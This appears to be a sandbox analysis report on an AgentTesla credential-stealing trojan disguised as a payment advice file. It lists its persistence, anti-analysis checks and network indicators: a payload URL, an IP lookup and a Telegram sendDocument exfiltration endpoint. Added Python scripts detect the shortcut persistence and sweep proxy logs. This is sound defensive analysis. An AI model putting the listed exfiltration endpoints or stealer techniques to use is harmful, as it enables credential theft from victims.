Analysis Report USD67,884.08_Payment_Advise_9083008849.exe

Overview

General Information

Sample Name: USD67,884.08_Payment_Advise_9083008849.exe
Analysis ID: 321416
MD5: 947edeb169369ac67c5448cc2f8104a3
SHA1: 5d2181f018ab4b8afd6b193e4651233b44ad7d62
SHA256: 3a89a79e825bf330e3ea46f6a5f548529b642dc61219a8deeaec070a0688a08e
Tags: AgentTesla, exe, HSBC


Detection

AgentTesla
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Startup

  • System is w10x64
  • Uclldrv.exe (PID: 6756 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe' MD5: 947EDEB169369AC67C5448CC2F8104A3)
    • Uclldrv.exe (PID: 6868 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe MD5: 947EDEB169369AC67C5448CC2F8104A3)
  • Uclldrv.exe (PID: 5900 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe' MD5: 947EDEB169369AC67C5448CC2F8104A3)
  • cleanup

Uclldrv.exe has the same MD5 as the submitted sample (947edeb169369ac67c5448cc2f8104a3), so it is a byte-identical copy of the original placed under %LOCALAPPDATA%\Microsoft\Windows. PID 6756 then starts a second copy of itself (PID 6868), which is consistent with the "Creates a process in suspended mode (likely to inject code)" and "Injects a PE file into a foreign processes" signatures above.

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\llcU.url
Rule: Methodology_Shortcut_HotKey
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x9b: $hotkey: \x0AHotKey=1
  • 0x0: $url_explicit: [InternetShortcut]

Source: C:\Users\user\AppData\Local\llcU.url
Rule: Methodology_Contains_Shortcut_OtherURIhandlers
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x14: $file: URL=
  • 0x0: $url_explicit: [InternetShortcut]

Source: C:\Users\user\AppData\Local\llcU.url
Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x70: $icon: IconFile=
  • 0x0: $url_explicit: [InternetShortcut]
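The three rule hits on llcU.url describe one persistence technique: an Internet Shortcut (.url) that starts with [InternetShortcut], points its URL= at something other than an http(s) target, takes its icon from a file that is not an .exe/.dll/.ico, and carries a HotKey= binding. The script below is an added example for triaging such files on a host; it is not Joe Sandbox code and not the YARA rules' own source. The conditions are this editor's reading of the matched strings, not the exact rule bodies, and the sample shortcut content is constructed: the report only shows the string offsets, so the URL= target and IconFile= value are assumptions.

```python
import os
import re

# Constructed sample standing in for the dropped llcU.url. The report shows the
# file starts with [InternetShortcut] (offset 0x0), has URL= at 0x14, IconFile=
# at 0x70 and a "\nHotKey=1" line at 0x9b. The target path and the icon path
# (deliberately without an .exe/.dll/.ico extension so the third rule fires, as
# it did on the real file) are assumptions, not values recovered from the sample.
SUSPICIOUS_URL = (
    "[InternetShortcut]\r\n"
    "URL=file:///C:/Users/user/AppData/Local/Microsoft/Windows/Uclldrv.exe\r\n"
    "IconFile=C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Uclldrv\r\n"
    "IconIndex=0\r\n"
    "HotKey=1\r\n"
)

# Constructed benign shortcut: https target, icon taken from a DLL, no hotkey.
BENIGN_URL = (
    "[InternetShortcut]\r\n"
    "URL=https://www.example.com/\r\n"
    "IconFile=C:\\Windows\\System32\\SHELL32.dll\r\n"
    "IconIndex=13\r\n"
)

# Approximations of the three rules, derived from the matched strings above.
HOTKEY_RE = re.compile(r"\nHotKey=[1-9]")                 # "\x0AHotKey=1" in the report
HTTP_URL_RE = re.compile(r"^URL=https?://", re.I | re.M)   # the ordinary URL= form
ICON_OK_RE = re.compile(r"^IconFile=.*\.(exe|dll|ico)\s*$", re.I | re.M)


def triage_url_shortcut(data: bytes) -> dict:
    """Return string offsets and rule-style flags for one .url file's bytes."""
    text = data.decode("latin-1")  # 1:1 byte mapping, so str offsets equal file offsets
    hot = HOTKEY_RE.search(text)
    offsets = {
        "url_explicit": text.find("[InternetShortcut]"),
        "file": text.find("URL="),
        "icon": text.find("IconFile="),
        "hotkey": hot.start() if hot else -1,
    }
    is_shortcut = offsets["url_explicit"] == 0  # every rule requires the header "at 0"
    flags = {
        "Shortcut_HotKey": is_shortcut and offsets["hotkey"] >= 0,
        "Shortcut_OtherURIhandlers": is_shortcut and offsets["file"] >= 0
                                     and not HTTP_URL_RE.search(text),
        "IconNotFromExeOrDLLOrICO": is_shortcut and offsets["icon"] >= 0
                                    and not ICON_OK_RE.search(text),
    }
    return {"offsets": offsets, "flags": flags, "suspicious": any(flags.values())}


def scan_tree(root: str):
    """Yield (path, result) for every flagged .url file under root, e.g. the
    user's AppData\\Local tree or the Startup folders where this persistence lands."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".url"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    result = triage_url_shortcut(fh.read())
                if result["suspicious"]:
                    yield path, result


if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_URL), ("benign", BENIGN_URL)):
        print(label, triage_url_shortcut(blob.encode("latin-1")))
```

Decoding as latin-1 keeps the string offsets identical to the file offsets YARA reports, which makes it easy to compare a hit against the 0x0 / 0x14 / 0x70 / 0x9b positions listed above; a file that does not begin with [InternetShortcut] matches nothing, exactly as the rules' "at 0" condition requires.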

Memory Dumps

Source | Rule | Description | Author
00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.468175139.00000000023E0000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000012.00000002.469055192.00000000025F0000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
[further entries truncated in this rendering]

Unpacked PEs

Source | Rule | Description | Author
18.2.Uclldrv.exe.25f0000.1.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
18.2.Uclldrv.exe.25f0000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
5.2.USD67,884.08_Payment_Advise_9083008849.exe.4a10000.4.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
18.2.Uclldrv.exe.4f00000.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
5.2.USD67,884.08_Payment_Advise_9083008849.exe.23e0000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
[further entries truncated in this rendering]

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | ReversingLabs: Detection: 22%
Multi AV Scanner detection for submitted file
Source: USD67,884.08_Payment_Advise_9083008849.exe | Virustotal: Detection: 40%
Source: USD67,884.08_Payment_Advise_9083008849.exe | ReversingLabs: Detection: 22%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: USD67,884.08_Payment_Advise_9083008849.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 13.2.Uclldrv.exe.2ab0000.5.unpack | Avira: Label: TR/Hijacker.Gen
Source: 13.2.Uclldrv.exe.45e0000.6.unpack | Avira: Label: TR/Dropper.Gen
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Code function: 4x nop then xor edx, edx (listed 3 times in the original report); 4x nop then xor eax, eax (listed 5 times); 4x nop then mov eax, dword ptr [ebx] (listed 3 times)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Code function: 4x nop then xor edx, edx (listed 5 times in the original report); 4x nop then xor eax, eax (listed 7 times); 4x nop then mov eax, dword ptr [ebx] (listed 6 times)
Source: global traffic | HTTP traffic detected: GET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1  Host: airseaalliance.com  Cache-Control: no-cache  (this request appears six times in the original listing)
Source: Joe Sandbox View | IP Address: 162.159.136.232
Source: Joe Sandbox View | IP Address: 162.159.138.232
Source: unknown | DNS traffic detected: queries for: discord.com
Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: Uclldrv.exe, 0000000D.00000002.363645356.0000000003FF0000.00000004.00000001.sdmp, Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.co
Source: Uclldrv.exe, 0000000D.00000002.363645356.0000000003FF0000.00000004.00000001.sdmp, Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-adm0
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-admin/t
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-admin/twent
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-admin/twenty-se
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-admin/twenty-sevent8
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/7009$
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll0848
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374H
Source: Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8
Source: Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp | String found in binary or memory: http://hHeaxI.com
Source: Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.orgGETMozilla/5.0
Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
Source: Uclldrv.exe, 0000000D.00000002.363645356.0000000003FF0000.00000004.00000001.sdmp, Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: https://discord.com/
Source: Uclldrv.exe, 0000000D.00000002.363645356.0000000003FF0000.00000004.00000001.sdmp, Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmp | String found in binary or memory: https://discord.com/J
Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Window created: window name: CLIPBRDWNDCLASS
Source: Yara match | File source: Process Memory Space: Uclldrv.exe PID: 6756, type: MEMORY
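The network evidence above yields a small, concrete indicator set: the payload GET to airseaalliance.com on a fixed path (issued, per the "HTTP GET or POST without a user agent" signature, with no User-Agent), the two resolved IPs, and the AgentTesla recon/exfil endpoints recovered from memory (api.ipify.org for the victim's external address, api.telegram.org/bot.../sendDocument for uploading the loot). The script below is an added example of turning those into a web-proxy log sweep; it is not Joe Sandbox output or code. The log format is an assumed Squid-style layout, every log line is constructed, the Telegram bot token in it is invented, and the decision to treat the bare discord.com domain as too noisy to alert on is this editor's choice, not something the report states.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Indicators copied from the report above.
C2_HOST = "airseaalliance.com"
C2_PATH = "/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8"
C2_IPS = {"162.159.136.232", "162.159.138.232"}   # IPs the sandbox saw for the host
IP_LOOKUP_HOST = "api.ipify.org"                  # memory string: https://api.ipify.orgGETMozilla/5.0
TELEGRAM_SENDDOC_RE = re.compile(r"^/bot[^/]+/sendDocument$")  # api.telegram.org/bot%telegramapi%/sendDocument

# Constructed proxy log (assumed format: epoch client method url status "user-agent").
# Lines are invented to exercise each indicator; the bot token is fake.
SAMPLE_LOG = """\
1605000001 10.0.0.7 GET http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 200 "-"
1605000002 10.0.0.7 GET https://api.ipify.org/ 200 "Mozilla/5.0"
1605000003 10.0.0.7 POST https://api.telegram.org/bot123456:FAKE-TOKEN/sendDocument 200 "-"
1605000004 10.0.0.9 GET https://discord.com/ 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
1605000005 10.0.0.9 GET https://www.example.com/index.html 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""

LOG_RE = re.compile(
    r'^(?P<ts>\d+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def classify(line: str):
    """Return a record with the indicator hits for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    u = urlsplit(m["url"])
    host = (u.hostname or "").lower()
    hits = []
    if host == C2_HOST and u.path == C2_PATH:
        hits.append("agenttesla_payload_url")      # exact path from the sandbox GET
    elif host == C2_HOST or host in C2_IPS:
        hits.append("agenttesla_c2_host")          # same host/IP, any other path
    if host == IP_LOOKUP_HOST:
        hits.append("external_ip_lookup")          # recon step that precedes exfil
    if host == "api.telegram.org" and TELEGRAM_SENDDOC_RE.match(u.path):
        hits.append("telegram_senddocument_exfil")
    if m["method"] in ("GET", "POST") and m["ua"] in ("", "-"):
        hits.append("no_user_agent")               # the "without a user agent" signature
    # discord.com on its own is deliberately not flagged: the DNS query is in the
    # report, but the bare domain is too common to alert on without a webhook path.
    return {"ts": int(m["ts"]), "src": m["src"], "host": host, "hits": hits}


def scan(log_text: str) -> list:
    """All parsable lines with at least one hit, in log order."""
    return [r for r in map(classify, log_text.splitlines()) if r and r["hits"]]


def by_source(records: list) -> dict:
    """Collapse hits per client so one host's full chain is visible at a glance."""
    out = defaultdict(set)
    for r in records:
        out[r["src"]].update(r["hits"])
    return {src: sorted(h) for src, h in out.items()}


if __name__ == "__main__":
    for src, hits in by_source(scan(SAMPLE_LOG)).items():
        print(src, hits)
```

Grouping by client matters more than any single hit: the payload fetch, the ipify lookup and a Telegram sendDocument upload from one workstation within seconds of each other is the chain this report describes, whereas an ipify lookup alone is routine on many networks.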

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: USD67,884.08_Payment_Advise_9083008849.exe
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Code functions: 0_3_03ECBAC4, 0_3_03ECBA44, 0_3_03ECBA42, 0_3_03EC9170, 0_3_03EC9931, 0_3_03ED6E58, 0_3_03ED6E58, 0_3_03EBFEC0, 0_3_03EBFEC0
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Code functions: 5_2_00408C60, 5_2_0040DC11, 5_2_00407C3F, 5_2_00418CCC, 5_2_00406CA0, 5_2_004028B0, 5_2_0041A4BE, 5_2_00418244, 5_2_00401650, 5_2_00402F20, 5_2_004193C4, 5_2_00418788, 5_2_00402F89, 5_2_00402B90, 5_2_004073A0, 5_2_022A0C60, 5_2_022A0C50, 5_2_04A80006, 5_2_04A80040, 5_2_05A82D58, 5_2_05A84C70, 5_2_05A82140, 5_2_05A82488
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Code functions: 13_3_03F1BAC4, 13_3_03F1BA42, 13_3_03F1BA44, 13_3_03F19170, 13_3_03F19931, 13_3_03F26E58, 13_3_03F26E58, 13_3_03F0FEC0, 13_3_03F0FEC0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Code functions: 16_3_03F4BAC4, 16_3_03F4BA44, 16_3_03F4BA42, 16_3_03F49931
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Code functions: 18_2_00408C60, 18_2_0040DC11, 18_2_00407C3F, 18_2_00418CCC, 18_2_00406CA0, 18_2_004028B0, 18_2_0041A4BE, 18_2_00418244, 18_2_00401650, 18_2_00402F20, 18_2_004193C4, 18_2_00418788, 18_2_00402F89, 18_2_00402B90, 18_2_004073A0, 18_2_02340C60, 18_2_02340C50, 18_2_04F90040, 18_2_04F9003A, 18_2_04F99283, 18_2_05A82FA0, 18_2_05A82388, 18_2_05A84EB0, 18_2_05A826D0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Code functions: 18_1_00408C60, 18_1_0040DC11, 18_1_00407C3F, 18_1_00418CCC, 18_1_00406CA0, 18_1_004028B0, 18_1_0041A4BE, 18_1_00418244, 18_1_00401650, 18_1_00402F20, 18_1_004193C4, 18_1_00418788, 18_1_00402F89, 18_1_00402B90, 18_1_004073A0
(The 5_2 list for the submitted sample and the 18_2 / 18_1 lists for Uclldrv.exe contain the same addresses, 00408C60 through 004073A0, as expected for a byte-identical copy of the sample.)
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Code function: String function: 0040D606 appears 48 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Code function: String function: 0040E1D8 appears 88 times
Source: USD67,884.08_Payment_Advise_9083008849.exe | Static PE information: invalid certificate
Source: USD67,884.08_Payment_Advise_9083008849.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Uclldrv.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.477801759.0000000005630000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs USD67,884.08_Payment_Advise_9083008849.exe
Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.468175139.00000000023E0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameygwxuBNDsCnleMFrPILFrkECdmuYRRQwMZPAraQ.exe4 vs USD67,884.08_Payment_Advise_9083008849.exe
Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.468175139.00000000023E0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename_.dll4 vs USD67,884.08_Payment_Advise_9083008849.exe
Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.468624139.0000000002490000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dllj% vs USD67,884.08_Payment_Advise_9083008849.exe
Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.477770135.0000000005620000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewbemdisp.tlbj% vs USD67,884.08_Payment_Advise_9083008849.exe
Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.468661954.00000000024A0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs USD67,884.08_Payment_Advise_9083008849.exe
Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.469808808.000000000262A000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameclrjit.dllT vs USD67,884.08_Payment_Advise_9083008849.exe
Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.469808808.000000000262A000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs USD67,884.08_Payment_Advise_9083008849.exe
Source: USD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.469808808.000000000262A000.00000004.00000001.sdmp | Binary or memory string: m,\\StringFileInfo\\040904B0\\OriginalFilename vs USD67,884.08_Payment_Advise_9083008849.exe
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Section loaded: mscorjit.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | Section loaded: mscorjit.dll
Source: 0000000D.00000002.362836092.0000000002AC7000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000D.00000002.362836092.0000000002AC7000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: C:\Users\user\AppData\Local\llcU.url, type: DROPPED | Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\llcU.url, type: DROPPED | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\llcU.url, type: DROPPED | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/5@6/4
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe | Code function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe Command line argument: 08A
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: USD67,884.08_Payment_Advise_9083008849.exe Virustotal: Detection: 40%
Source: USD67,884.08_Payment_Advise_9083008849.exe ReversingLabs: Detection: 22%
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe File read: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
Source: unknown Process created: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe 'C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe'
Source: unknown Process created: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
Source: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe Process created: C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
